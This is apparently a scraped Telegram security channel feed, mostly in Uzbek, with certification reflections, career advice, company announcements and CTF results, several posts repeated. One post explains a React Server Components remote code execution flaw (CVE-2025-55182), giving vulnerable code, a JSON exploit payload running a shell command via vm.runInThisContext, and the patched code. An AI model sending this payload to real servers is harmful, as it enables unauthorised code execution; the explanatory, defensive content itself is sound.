JavaSec
CVE-2025-23298 Remote Code Execution in NVIDIA Merlin * writeUP + exploit
CVE-2025-23298 — Remote code execution via unsafe Python pickle deserialization in NVIDIA Merlin/Transformers4Rec when torch.load() loads untrusted checkpoint files; avoid loading untrusted checkpoints and prefer weights_only=True or safetensors/restricted deserialization.
❤1🕊1
Slowly but surely - Expert level unlocked 🔓
Har bir kichik qadam — katta natijaga eltadi.
100/100 and good report !
Har bir kichik qadam — katta natijaga eltadi.
100/100 and good report !
11🔥16🤡5❤🔥2👍2❤1🕊1
JavaSec
Slowly but surely - Expert level unlocked 🔓 Har bir kichik qadam — katta natijaga eltadi. 100/100 and good report !
CWEE: o‘zim uchun, siz bilan bo‘lishish uchun yozilgan post
Bu postni maqtanish uchun emas, bir kun o‘zim o‘qib “qayerdan boshlangan edim” deb eslash va balki kimlargadir yo‘l-yo‘riq bo‘lishi uchun yozayapman. Yaqinda Hack The Box Certified Web Exploitation Expert (CWEE) certificati oldim.
Exam’ning practical qismini 5 kunda tugatdim, keyin yana 3 kun faqat report yozishga sarfladim. Oxirida nihoyat “Congratulations” degan email va certificat keldi )
Shu jarayon davomida juda ko‘p narsa o‘rgandim – nafaqat texnik, balki sabr, reja, vaqtni boshqarish. Shu haqda sokin, haligiday “guru” gaplarsiz yozmoqchiman.
⸻
CWEE – mening ko‘zlarim bilan
Official tomoni bilan aytganda, CWEE – advanced / expert darajadagi web exploitation certificati.
Ammo men uchun CWEE:
Bu yerda:
• faqat XSS/SQLi topib qo‘ya qolish emas,
• source code review qilish,
• bir nechta kichik zaiflikni bitta katta impact’li chain’ga aylantirish,
• va eng asosiysi – hammasini tartibli qilib yozib berish talab qilinadi.
Shu tomoni menga yoqdi: exam faqat “flag top” emas, balki “real pentest ishini boshidan oxirigacha bajar” formatiga juda yaqin.
⸻
Nega aynan CWEE?
Uzoq vaqt “faqat exploit qilish” tarafdori bo‘lib yurganman. Lab’lar, CTF’lar, box’lar – flag topaman, bo‘ldi.
Lekin sekin-sekin shuni tushundimki:
• real dunyoda client’ga report bermasang, qilgan ishingning yarmi yo‘q;
• har doim ham black-box emas, ko‘p joyda white-box / source code review so‘rashadi;
• senior / lead darajada ishlash uchun “faqat payload yozish” yetarli emas.
HTB’dagi Senior Web Penetration Tester learning path’ini boshlaganimda CWEE’ni o‘zim uchun “checkpoint” qilib qo‘ygandim. Shu path’ni tugatib, oxirida “ha, mana shu yo‘lni chindan ham bosib o‘tdim” deyish uchun shu examni tanladim.
⸻
Mendan ketgan asosiy saboqlar
Bu exam orqali o‘zimda quyidagilarni aniqroq his qildim:
1️⃣ Sabr va reja
“Yana bitta endpoint, yana bitta directory brute” deb ko‘r-ko‘rona yugurish emas, balki:
• qaysi attack surface ustuvor,
• qayerda code review ko‘proq natija beradi,
• qaysi yo‘l rabbit-hole – shularni oldindan o‘ylash.
2️⃣ Note-taking – hamma narsa
Har bir kichik observatsiya:
• “bu header g‘alati ekan”,
• “bu error bir marta ko‘rindi”,
• “bu joyda strange behavior bor”,
keyin chain qilishda juda kerakli bo‘lib chiqadi.
3️⃣ Reporting – real darajani ko‘rsatadi
Exploit qilish – boshlanishi xolos. Boshqaga tushunarli qilib, biznes tilida, texnik detal bilan tushuntirish – bu boshqa bosqich. CWEE aynan shu tomonni juda yaxshi “siqib” ko‘rsatadi.
4️⃣ “Men hammasini bilaman” degan fikrdan qochish
Exam davomida ham, reportda ham bir necha marta:
“Bunaqa patternni ko‘rganman, lekin yana tekshirib olay,”
deb o‘zimni to‘xtatdim. Shu yondashuv ko‘p xatolardan saqladi.Bir necha marta qayta yozdim albatta yaxshiroq chiqishi uchun
⸻
Yakuniy fikr
CWEE – men uchun “finish line” emas, balki yangi bosqichga kirish uchun kichik checkpoint bo‘ldi. Certificat olingani bilan hech narsa tugamadi, aksincha:
• ko‘proq mas’uliyat,
• ko‘proq o‘rganish majburiyati,
• va o‘rganganlarimni boshqalar bilan bo‘lishish istagi paydo bo‘ldi.
Agar siz ham web security yo‘lida yurgan bo‘lsangiz va bir kun CWEE haqida o‘ylayotgan bo‘lsangiz, shoshilmay, lekin to‘xtamasdan davom eting togri vaqt keladi.
Bu postni maqtanish uchun emas, bir kun o‘zim o‘qib “qayerdan boshlangan edim” deb eslash va balki kimlargadir yo‘l-yo‘riq bo‘lishi uchun yozayapman. Yaqinda Hack The Box Certified Web Exploitation Expert (CWEE) certificati oldim.
Exam’ning practical qismini 5 kunda tugatdim, keyin yana 3 kun faqat report yozishga sarfladim. Oxirida nihoyat “Congratulations” degan email va certificat keldi )
Shu jarayon davomida juda ko‘p narsa o‘rgandim – nafaqat texnik, balki sabr, reja, vaqtni boshqarish. Shu haqda sokin, haligiday “guru” gaplarsiz yozmoqchiman.
⸻
CWEE – mening ko‘zlarim bilan
Official tomoni bilan aytganda, CWEE – advanced / expert darajadagi web exploitation certificati.
Ammo men uchun CWEE:
“Real hayotga yaqin, bir nechta web ilova, code review, murakkab chain’lar va oxirida kattagina report bilan tugaydigan marafon.”
Bu yerda:
• faqat XSS/SQLi topib qo‘ya qolish emas,
• source code review qilish,
• bir nechta kichik zaiflikni bitta katta impact’li chain’ga aylantirish,
• va eng asosiysi – hammasini tartibli qilib yozib berish talab qilinadi.
Shu tomoni menga yoqdi: exam faqat “flag top” emas, balki “real pentest ishini boshidan oxirigacha bajar” formatiga juda yaqin.
⸻
Nega aynan CWEE?
Uzoq vaqt “faqat exploit qilish” tarafdori bo‘lib yurganman. Lab’lar, CTF’lar, box’lar – flag topaman, bo‘ldi.
Lekin sekin-sekin shuni tushundimki:
• real dunyoda client’ga report bermasang, qilgan ishingning yarmi yo‘q;
• har doim ham black-box emas, ko‘p joyda white-box / source code review so‘rashadi;
• senior / lead darajada ishlash uchun “faqat payload yozish” yetarli emas.
HTB’dagi Senior Web Penetration Tester learning path’ini boshlaganimda CWEE’ni o‘zim uchun “checkpoint” qilib qo‘ygandim. Shu path’ni tugatib, oxirida “ha, mana shu yo‘lni chindan ham bosib o‘tdim” deyish uchun shu examni tanladim.
⸻
Mendan ketgan asosiy saboqlar
Bu exam orqali o‘zimda quyidagilarni aniqroq his qildim:
1️⃣ Sabr va reja
“Yana bitta endpoint, yana bitta directory brute” deb ko‘r-ko‘rona yugurish emas, balki:
• qaysi attack surface ustuvor,
• qayerda code review ko‘proq natija beradi,
• qaysi yo‘l rabbit-hole – shularni oldindan o‘ylash.
2️⃣ Note-taking – hamma narsa
Har bir kichik observatsiya:
• “bu header g‘alati ekan”,
• “bu error bir marta ko‘rindi”,
• “bu joyda strange behavior bor”,
keyin chain qilishda juda kerakli bo‘lib chiqadi.
3️⃣ Reporting – real darajani ko‘rsatadi
Exploit qilish – boshlanishi xolos. Boshqaga tushunarli qilib, biznes tilida, texnik detal bilan tushuntirish – bu boshqa bosqich. CWEE aynan shu tomonni juda yaxshi “siqib” ko‘rsatadi.
4️⃣ “Men hammasini bilaman” degan fikrdan qochish
Exam davomida ham, reportda ham bir necha marta:
“Bunaqa patternni ko‘rganman, lekin yana tekshirib olay,”
deb o‘zimni to‘xtatdim. Shu yondashuv ko‘p xatolardan saqladi.Bir necha marta qayta yozdim albatta yaxshiroq chiqishi uchun
⸻
Yakuniy fikr
CWEE – men uchun “finish line” emas, balki yangi bosqichga kirish uchun kichik checkpoint bo‘ldi. Certificat olingani bilan hech narsa tugamadi, aksincha:
• ko‘proq mas’uliyat,
• ko‘proq o‘rganish majburiyati,
• va o‘rganganlarimni boshqalar bilan bo‘lishish istagi paydo bo‘ldi.
Agar siz ham web security yo‘lida yurgan bo‘lsangiz va bir kun CWEE haqida o‘ylayotgan bo‘lsangiz, shoshilmay, lekin to‘xtamasdan davom eting togri vaqt keladi.
🕊4❤3🤝2
JavaSec
CWEE: o‘zim uchun, siz bilan bo‘lishish uchun yozilgan post Bu postni maqtanish uchun emas, bir kun o‘zim o‘qib “qayerdan boshlangan edim” deb eslash va balki kimlargadir yo‘l-yo‘riq bo‘lishi uchun yozayapman. Yaqinda Hack The Box Certified Web Exploitation…
Savolingiz bo‘lsa, bemalol so‘rashingiz mumkin. Men o‘zimni “expert” deb hisoblamayman, shunchaki siz kabi o‘rganayotgan odamman – faqat yo‘lda biroz oldinroq chiqqan bo‘lishim mumkin xolos.
1🔥4❤🔥3❤1👍1🆒1
Oxirgi kunlarda ishga kirish qiyinlashib ketmadimi?
Nega ko‘p joylar bo‘sh ish o‘rni ochishadiyu, lekin siz talablarga mos bo‘lsangiz ham, hatto suhbatga ham chaqirishmaydi?
Siz nima qilsangiz ishga olinishingiz ehtimoli haqiqatan oshadi?
Shu savollarga o‘z fikrimni yozmoqchiman.
Asosiy muammo — siz hamma bilan bir xil bo‘lib qolgansiz.
Hamma “OWASP Top 10 bilaman”, “SQLi qila olaman Sqlmap run qilaman tamom”, “kurs tugatganman”, “CTF bajarama” degan joyda turibdi. Bu yomon emas, lekin bu endi farq qilmaydigan standart minimum.
Haqiqat shuki, bugungi bozor “CTF solver” emas, real muammo yechuvchi mutaxassis qidirmoqda.
Ba’zi odamlar juda kuchli bo’lishiga qaramay, nega intervyuga ham chaqirilmaydi? Chunki:
— Portfolio yo‘q
— Real loyihaga qo‘shgan hissasi yo‘q
— Faqat kurslar bilan devorni to‘ldirgan, amaliyotga kelganda jimmm
— “Boshqalardan nimam bilan farq qilaman?” degan savolga javob yo‘q…
Kompaniya bugun eski usul bilan, kitobdagi OWASP bilan emas, o‘z xizmatlariga bevosita ta’sir ko‘rsatadigan odam qidirmoqda.
Bugun bozorga kerak bo’lgan odam — “haqiqiy ishlab turgan tizimlarda muammolar topa oladigan”, “fikrlashi o‘zgacha”, “o‘zi mustaqil research qila oladigan”, “CVE olish darajasida tahlil qila oladigan” mutaxassis.
Ya’ni siz boshqacha bo‘lishingiz kerak.
Agar ishga kirish imkoniyatingizni oshirmoqchi bo‘lsangiz:
1) Portfolio – eng kuchli qiling.
Real zaifliklar, real PoClar, real yozilgan reportlar. Hatto private bo‘lsa ham — redacted versiyasini blogga chiqarsangiz bo‘ladi.
2) Research mindset.
Bugun bozorda “vazifa bajaruvi” emas, “muammo topuvchi va yechuvchi” yutadi.
3) Real codebaseda ishlay olishingiz.
CTFdа exploit qilgan bo‘lish yetmaydi — real loyiha arxitekturasini o‘qiy olish kerak.
4) Brand qurish.
Sizni kimdir ko‘rmasa, sizni “ishga olish” haqida o‘ylamaydi ham. Portfolio + GitHub + blog + LinkedIn — bu hozirgi davrning yangi CV’si.
5) Tanqidiy va mustaqil fikrlash.
Hamma exploit ko‘chiradi — siz esa exploit yaratasiz.
Hamma PoC ishlatadi — siz esa zaiflikning ildiz sababi haqida yozasiz.
Farq shu yerda.
Bugungi bozorda “men hamma qiladigan ishni qilaman” odam emas,
“men yarataman, o‘rganaman, tahlil qilaman” odam yutadi.
Btw
Ko’roq BugBountylarda qatnashing.
research qilib CVE oladigan darajada bo’lishingiz kerak deganda hech bo’lmaganda avval topilgan yoki hozirgi kunda topilayotgan zaifliklarni “public exploit”larini olib codelarini o’qib qayerda? qanday? va qayerga? Degan savollarga javob izlang va aniq bir kun siz ham CVE yoki hech kim topolmagan Zero-Daylar topasiz
@JavaSecuz
Nega ko‘p joylar bo‘sh ish o‘rni ochishadiyu, lekin siz talablarga mos bo‘lsangiz ham, hatto suhbatga ham chaqirishmaydi?
Siz nima qilsangiz ishga olinishingiz ehtimoli haqiqatan oshadi?
Shu savollarga o‘z fikrimni yozmoqchiman.
Asosiy muammo — siz hamma bilan bir xil bo‘lib qolgansiz.
Hamma “OWASP Top 10 bilaman”, “SQLi qila olaman Sqlmap run qilaman tamom”, “kurs tugatganman”, “CTF bajarama” degan joyda turibdi. Bu yomon emas, lekin bu endi farq qilmaydigan standart minimum.
Haqiqat shuki, bugungi bozor “CTF solver” emas, real muammo yechuvchi mutaxassis qidirmoqda.
Ba’zi odamlar juda kuchli bo’lishiga qaramay, nega intervyuga ham chaqirilmaydi? Chunki:
— Portfolio yo‘q
— Real loyihaga qo‘shgan hissasi yo‘q
— Faqat kurslar bilan devorni to‘ldirgan, amaliyotga kelganda jimmm
— “Boshqalardan nimam bilan farq qilaman?” degan savolga javob yo‘q…
Kompaniya bugun eski usul bilan, kitobdagi OWASP bilan emas, o‘z xizmatlariga bevosita ta’sir ko‘rsatadigan odam qidirmoqda.
Bugun bozorga kerak bo’lgan odam — “haqiqiy ishlab turgan tizimlarda muammolar topa oladigan”, “fikrlashi o‘zgacha”, “o‘zi mustaqil research qila oladigan”, “CVE olish darajasida tahlil qila oladigan” mutaxassis.
Ya’ni siz boshqacha bo‘lishingiz kerak.
Agar ishga kirish imkoniyatingizni oshirmoqchi bo‘lsangiz:
1) Portfolio – eng kuchli qiling.
Real zaifliklar, real PoClar, real yozilgan reportlar. Hatto private bo‘lsa ham — redacted versiyasini blogga chiqarsangiz bo‘ladi.
2) Research mindset.
Bugun bozorda “vazifa bajaruvi” emas, “muammo topuvchi va yechuvchi” yutadi.
3) Real codebaseda ishlay olishingiz.
CTFdа exploit qilgan bo‘lish yetmaydi — real loyiha arxitekturasini o‘qiy olish kerak.
4) Brand qurish.
Sizni kimdir ko‘rmasa, sizni “ishga olish” haqida o‘ylamaydi ham. Portfolio + GitHub + blog + LinkedIn — bu hozirgi davrning yangi CV’si.
5) Tanqidiy va mustaqil fikrlash.
Hamma exploit ko‘chiradi — siz esa exploit yaratasiz.
Hamma PoC ishlatadi — siz esa zaiflikning ildiz sababi haqida yozasiz.
Farq shu yerda.
Bugungi bozorda “men hamma qiladigan ishni qilaman” odam emas,
“men yarataman, o‘rganaman, tahlil qilaman” odam yutadi.
Btw
Ko’roq BugBountylarda qatnashing.
research qilib CVE oladigan darajada bo’lishingiz kerak deganda hech bo’lmaganda avval topilgan yoki hozirgi kunda topilayotgan zaifliklarni “public exploit”larini olib codelarini o’qib qayerda? qanday? va qayerga? Degan savollarga javob izlang va aniq bir kun siz ham CVE yoki hech kim topolmagan Zero-Daylar topasiz
@JavaSecuz
1👏11😁3👍2🕊1
Forwarded from Ilhom Sobirov - GAP BOR!
🇷🇺 Сегодня я с гордостью объявляю, что присоединяюсь к совету директоров Turan Security.
Это не просто компания, это кибер-спецназ, играющий в высшей мировой лиге. Факты говорят сами за себя:
🚀 Мировой уровень: Мы в Hall of Fame NASA, Google, Alibaba и Amazon за найденные уязвимости.
Победы и доминирование: Наша команда Flagshare (часть экосистемы TuranSec) вернулась с международной конференции Cyber Kün 2025 в Бишкеке с триумфом: 🥇 1-е место в общем зачете турнира Cyber Ordo.
А также на Cyberkent 3.0 мы заняли: 🥇 1-е место — Blue team (Защита) 🥈 2-е место — Red team (Атака) 🥉 3-е место — CTF MASTER.
🧠 Элитная экспертиза подтверждена сертификатами, которые считаются "золотым стандартом" индустрии: CISSP, OSCP, PNPT, CISM, CEH и еще десятком других (CWEE, BTL1, CRTP, CAP, CAPP, CPTS, BCSP, ACSP, CMPen, CEDP).
🛡️ Национальный кибер-щит: Этой экспертизе доверяют более 30 крупнейших компаний Узбекистана, включая Ipak Yo'li banki, Hamkorbank, Click, Uztelecom, IT Park, O'zbekiston Temir Yo'llari и многие другие.
🇺🇿 Bugun men kiberxavfsizlik bo‘yicha jahon ligasida o‘ynayotgan Turan Security kompaniyasi direktorlar kengashiga qo‘shilganimni faxr bilan e’lon qilaman.
Bu shunchaki kompaniya emas, bu kiber-maxsus otryad. Faktlar gapirsin:
🚀 Jahon darajasi: Alibaba, Google, Amazon va hatto NASA — bizning Bug Bounty ro‘yxatimizda. Jamoa bir necha bor kritik zaifliklarni aniqlagan va ushbu gigantlarning Shon-sharaf zaliga (Hall of Fame) kiritilgan.
🏆 Chempionlar: Jamoamiz yaqinda Cyber Kün 2025 xalqaro turnirida mutlaq 1-o‘rinni egalladi.
Cyberkent 3.0 musobaqasida biz quyidagi o‘rinlar: 🥇 1-o‘rin — Blue team (Himoya) 🥈 2-o‘rin — Red team (Hujum) 🥉 3-o‘rin — CTF MASTER
🧠 Elita: CISSP, OSCP kabi o‘ntalab "oltin standart" sertifikatlariga egamiz.
🛡️ Ishonch: Ipak Yo'li banki, Click, Uztelecom kabi 30+ yirik kompaniya bizning himoyamizda.
Mening missiyam — odamlarga sarmoya kiritish va O‘zbekistonning eng kuchli milliy kiber-qalqonini qurish.
@TuranSecurity | www.turansecurity.uz
1👍6❤4🔥2
🚨 CVE-2025-55182 - React Server Components RCE
CVSS Score: 10.0/10 (Maximum xavflilik)
Qaysi versiyalar vulnerable?
React Server Actions serialize qilayotganda hasOwnProperty check qilmaydi. Natijada prototype chain orqali kirib, server'da istalgan code run qilish mumkin.
Vulnerable code:
Prototype chain muammosi:
Exploit qanday ishlaydi?
Attacker shunday payload yuboradi:
Server bu request'ni qabul qilgach:
Fixed code:
CVSS Score: 10.0/10 (Maximum xavflilik)
Qaysi versiyalar vulnerable?
React 19.0.0 - 19.2.0
Next.js 15.x va 16.x (App Router)
Server Components ishlatadigan barcha loyihalar
React Server Actions serialize qilayotganda hasOwnProperty check qilmaydi. Natijada prototype chain orqali kirib, server'da istalgan code run qilish mumkin.
Vulnerable code:
function requireModule(metadata) {
const moduleExports = require(metadata[0]);
return moduleExports[metadata[2]]; // prototype chain ga kiradi
}Prototype chain muammosi:
const vm = require('vm');
vm.hasOwnProperty('runInThisContext'); // false
vm['runInThisContext']; // lekin accessible! ❌Exploit qanday ishlaydi?
Attacker shunday payload yuboradi:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": {
"id": "vm#runInThisContext",
"bound": ["require('child_process').execSync('whoami').toString()"]
}
}Server bu request'ni qabul qilgach:
1.vm module'ni load qiladi
2.vm['runInThisContext'] prototype orqali olinadi
3.Attacker'ning code'i argument sifatida bind .bo'ladi
4.Execute bo'lganda vm.runInThisContext() malicious code'ni ishga tushiradi
5.RCE achieved - server butunlay compromised
Fixed code:
function requireModule(metadata) {
const moduleExports = require(metadata[0]);
if (!hasOwnProperty.call(moduleExports, metadata[2])) {
throw new Error('Export not found');
}
return moduleExports[metadata[2]];
}❤1
JavaSec
🚨 CVE-2025-55182 - React Server Components RCE CVSS Score: 10.0/10 (Maximum xavflilik) Qaysi versiyalar vulnerable? React 19.0.0 - 19.2.0 Next.js 15.x va 16.x (App Router) Server Components ishlatadigan barcha loyihalar React Server Actions serialize qilayotganda…
image_2025-12-04_10-47-39.png
442.7 KB
❤1
Forwarded from Turan Security
🏆 BlackHat MEA 2025 CTF musobaqasida 12-o'rin!
Turan Security va O'zbekiston shahafini himoya qilgan jamoa dunyoning eng nufuzli kiberxavfsizlik musobaqalaridan birida 125 jamoa orasidan TOP-12 talikdan joy oldi!
Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.
TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:
Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirish.
Turan Security va O'zbekiston shahafini himoya qilgan jamoa dunyoning eng nufuzli kiberxavfsizlik musobaqalaridan birida 125 jamoa orasidan TOP-12 talikdan joy oldi!
Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.
TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:
🚩Firstblood - web, birinchi;
🚩Firstblood - forensics, birinchi;
🚩Secondblood - web, ikkinchi bo'lib flagni aniqlashga erishdi.
Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirish.
1🔥7❤2🤝1